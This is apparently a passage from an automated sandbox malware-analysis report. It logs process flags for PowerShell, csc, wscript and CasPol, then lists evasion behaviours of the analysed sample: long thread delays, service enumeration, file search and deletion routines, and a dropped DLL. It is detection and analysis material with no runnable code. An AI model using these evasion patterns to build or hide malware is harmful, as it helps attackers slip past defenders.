                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0040E54F Sleep,ExitProcess,10_2_0040E54F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_004198D2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7308Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2384Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3413Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6400Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 1581Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 8408Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_10-53444
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 9.6 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4796Thread sleep count: 7308 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4796Thread sleep count: 2384 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2260Thread sleep count: 1581 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2260Thread sleep time: -4743000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2260Thread sleep count: 8408 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2260Thread sleep time: -25224000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,10_2_0041B43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0044D5F9 FindFirstFileExA,10_2_0044D5F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,10_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,10_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,10_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00418C79
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,10_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_10006580 FindFirstFileExA,10_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406F06
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000007.00000002.2551030711.000000000C4A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4']qemU
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000007.00000002.2438035679.0000000007A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1_20
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
